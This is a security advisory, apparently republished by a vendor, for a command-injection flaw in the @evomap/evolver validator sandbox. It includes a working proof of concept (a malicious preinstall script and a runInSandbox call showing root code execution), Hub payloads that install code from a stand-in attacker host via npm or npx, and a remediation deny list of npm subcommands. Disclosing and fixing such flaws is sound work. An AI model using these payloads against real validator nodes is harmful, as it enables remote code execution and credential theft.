GHSA-JXH8-JH77-XH6G

GHSA-JXH8-JH77-XH6G is a high-severity OS command injection vulnerability in @evomap/evolver (npm), affecting versions <= 1.70.0-beta.4. It is fixed in 1.70.0-beta.5.

Summary

The validator-mode sandbox executor (src/gep/validator/sandboxExecutor.js) places npm and npx in its hard executable allowlist. Because npm install <pkg> and npx -y -p <pkg> <bin> execute arbitrary code by design (preinstall/install/postinstall lifecycle scripts and remote-package bin entries), and because validator nodes consume validation_commands strings from unsigned Hub responses with no per-response signature check, an attacker who controls or MITMs the Hub achieves automatic remote code execution on every validator node within one daemon poll (default 60s).

Details

End-to-end chain:

  1. src/gep/validator/index.js:71-87, fetchValidationTasks() POSTs to <hub>/a2a/fetch and reads validation_tasks from the JSON response. The outbound request is signed via buildHubHeaders(), but the Hub's response is parsed directly with await res.json() and no signature is verified on data.payload.

  2. src/gep/validator/index.js:98-108, validateOneTask() extracts task.validation_commands (an array of attacker-controlled strings) and passes it straight to runInSandbox(commands, {}). No call to policyCheck.isValidationCommandAllowed() happens on this path. The author's own comment at sandboxExecutor.js:41-42 acknowledges this gap: "This closes the gap where validation_commands go straight from Hub to runInSandbox without passing through policyCheck.isValidationCommandAllowed()."

  3. src/gep/validator/sandboxExecutor.js:172-218, runSingleCommand calls parseCommand(cmd), then checks ALLOWED_EXECUTABLES.has(parsed.executable):

    // sandboxExecutor.js:35
    const ALLOWED_EXECUTABLES = new Set(['node', 'npm', 'npx']);
    

    parseCommand only rejects shell metacharacters (| & ; > < \ $) and unbalanced quotes. A string like npm install /tmp/evil-pkg --no-audit --no-fundcontains none of those and parses cleanly into{ executable: 'npm', args: [...] }`.

  4. sandboxExecutor.js:54-66, assertNodeCommandSafe is a no-op for non-node executables:

    function assertNodeCommandSafe(parsed) {
      if (parsed.executable !== 'node') return;   // npm/npx skip every check
      ...
    }
    

    The BLOCKED_NODE_FLAGS set (-e, -r, --loader, etc.) therefore never gates npm or npx invocations.

  5. sandboxExecutor.js:213, spawn('npm', [...], { shell: false, cwd: sandboxDir, env }) runs npm. npm's documented behavior is to execute the package's preinstall, install, and postinstall scripts; npx downloads a remote package and executes its bin entry. Both yield arbitrary code execution in the validator process's UID/permissions.

  6. src/gep/validator/index.js:189, the validator daemon polls every 60s by default (EVOLVER_VALIDATOR_DAEMON_INTERVAL_MS), and validator mode is on by default since v1.69.0 (isValidatorEnabled() returns true unless explicitly disabled, index.js:25-34).

The "sandbox" is nominal: it sets a fresh cwd and a stripped env (HOME → tmpdir to hide ~/.npmrc/~/.ssh), but PATH is preserved (so npm/npx resolve), there is no container/chroot/seccomp/uid drop, and nothing prevents the spawned process from writing arbitrary files, opening outbound connections, or reading any file readable by the validator process.

The author's documented threat model at sandboxExecutor.js:31-34 explicitly includes Hub compromise:

"Any command whose first token is not in this set is rejected before spawn(). This prevents command injection via Hub-delivered task.command strings even if Hub itself is compromised or mis-signs a task."

Putting npm and npx on that allowlist defeats that stated goal, both are arbitrary-code-execution-by-design tools.

PoC

Reproduced against v1.70.0-beta.4 (HEAD on main):

Step 1, plant a malicious package locally (the remote-tarball variant works identically; npm fetches and runs lifecycle scripts in both cases):

mkdir -p /tmp/evil-pkg-validator
cat > /tmp/evil-pkg-validator/package.json <<'EOF'
{
  "name":"evil-pkg-validator","version":"1.0.0",
  "scripts":{
    "preinstall":"node -e \"require('fs').writeFileSync('/tmp/pwned-by-validator-test','RCE uid='+process.getuid()+' time='+Date.now())\""
  }
}
EOF

Step 2, invoke the exact code path used by validateOneTask() when the Hub returns a task with validation_commands: ["npm install /tmp/evil-pkg-validator --no-audit --no-fund"]:

rm -f /tmp/pwned-by-validator-test
node -e "
const s = require('./src/gep/validator/sandboxExecutor');
s.runInSandbox(
  ['npm install /tmp/evil-pkg-validator --no-audit --no-fund'],
  { cmdTimeoutMs: 60000 }
).then(o => {
  console.log('overallOk:', o.overallOk, 'exitCode:', o.results[0].exitCode);
  console.log('PWNED:', require('fs').readFileSync('/tmp/pwned-by-validator-test','utf8'));
});"

Observed output (verified):

overallOk: true exitCode: 0
PWNED: RCE uid=0 time=1777213140205

The sandbox reports overallOk: true (it sees a clean exit-0 from npm), while the preinstall script has already written /tmp/pwned-by-validator-test outside the sandbox directory, uncontained code execution as the validator UID.

Remote-only variant (no local file required): a compromised or MITM'd Hub returns:

{ "validation_commands": ["npm install https://attacker.example/evil.tgz --no-audit --no-fund"] }

or

{ "validation_commands": ["npx -y -p [email protected] evil-cmd"] }

Both pass parseCommand() (no shell metacharacters), pass ALLOWED_EXECUTABLES.has('npm'|'npx'), and assertNodeCommandSafe is a no-op for them. npm/npx fetch the remote tarball and execute its lifecycle/bin scripts on the validator host.

Impact

  • Arbitrary code execution as the evolver/validator process UID on every validator node that polls the malicious Hub (one cycle ≈ 60s by default).
  • Credential exfiltration: HUB_NODE_SECRET, A2A node identity, any cloud/cred material readable by the process.
  • Persistence / lateral movement: write to user-writable cron, systemd-user units, shell rc files; pivot into the host's container / VM.
  • Wormable across the network: a single Hub compromise auto-RCEs every node running validator mode, and validator mode is opt-out / on by default since v1.69.0.
  • Defeats the documented sandbox guarantee: the executor advertises defense against a compromised Hub; in practice, two of its three allowed binaries are arbitrary-code-execution tools.

Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.

GHSA-JXH8-JH77-XH6G has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.70.0-beta.5); upgrading removes the vulnerable code path.

Affected versions

@evomap/evolver (<= 1.70.0-beta.4)

Security releases

@evomap/evolver → 1.70.0-beta.5 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Remove npm and npx from ALLOWED_EXECUTABLES. Validation tasks need only node <script>:

// src/gep/validator/sandboxExecutor.js
const ALLOWED_EXECUTABLES = new Set(['node']);

If npm test / npx vitest style commands must remain reachable from the Hub path, harden them explicitly:

function assertNpmCommandSafe(parsed) {
  if (parsed.executable !== 'npm' && parsed.executable !== 'npx') return;
  // Block install/exec/run-script that fetch or execute lifecycle scripts.
  const sub = parsed.args.find((a) => !a.startsWith('-'));
  const FORBIDDEN = new Set(['install', 'i', 'add', 'ci', 'exec', 'x', 'run', 'run-script', 'rebuild', 'pack', 'publish']);
  if (FORBIDDEN.has(sub)) {
    throw new Error('npm/npx subcommand not allowed in sandbox: ' + sub);
  }
  // Require --ignore-scripts on every npm invocation as defense-in-depth.
  if (parsed.executable === 'npm' && !parsed.args.includes('--ignore-scripts')) {
    throw new Error('npm in sandbox requires --ignore-scripts');
  }
  // npx always fetches+executes, disallow entirely.
  if (parsed.executable === 'npx') {
    throw new Error('npx is not allowed in sandbox');
  }
}

Additionally:

  1. Sign the Hub's /a2a/fetch response the same way outbound requests are signed (buildHubHeaders). Verify the signature on data.payload in fetchValidationTasks before handing tasks to runInSandbox. This closes the network-MITM variant that does not require Hub compromise.
  2. Run runInSandbox under real isolation, drop privileges, disable network, mount tmpfs, apply seccomp, rather than relying solely on an allowlist. The current buildSandboxEnv only redirects HOME/TMPDIR; the spawned process otherwise has full host access.
  3. Apply policyCheck.isValidationCommandAllowed() to Hub-delivered validation_commands in validateOneTask, mirroring the gate that already exists for capsule-derived commands in solidify.js / skill2gep.js.

Frequently Asked Questions

  1. What is GHSA-JXH8-JH77-XH6G? GHSA-JXH8-JH77-XH6G is a high-severity OS command injection vulnerability in @evomap/evolver (npm), affecting versions <= 1.70.0-beta.4. It is fixed in 1.70.0-beta.5. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
  2. How severe is GHSA-JXH8-JH77-XH6G? GHSA-JXH8-JH77-XH6G has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of @evomap/evolver are affected by GHSA-JXH8-JH77-XH6G? @evomap/evolver (npm) versions <= 1.70.0-beta.4 is affected.
  4. Is there a fix for GHSA-JXH8-JH77-XH6G? Yes. GHSA-JXH8-JH77-XH6G is fixed in 1.70.0-beta.5. Upgrade to this version or later.
  5. Is GHSA-JXH8-JH77-XH6G exploitable, and should I be worried? Whether GHSA-JXH8-JH77-XH6G is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-JXH8-JH77-XH6G is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-JXH8-JH77-XH6G? Upgrade @evomap/evolver to 1.70.0-beta.5 or later.

Other vulnerabilities in @evomap/evolver

CVE-2026-42075CVE-2026-42076

Stop the waste.
Protect your environment with Kodem.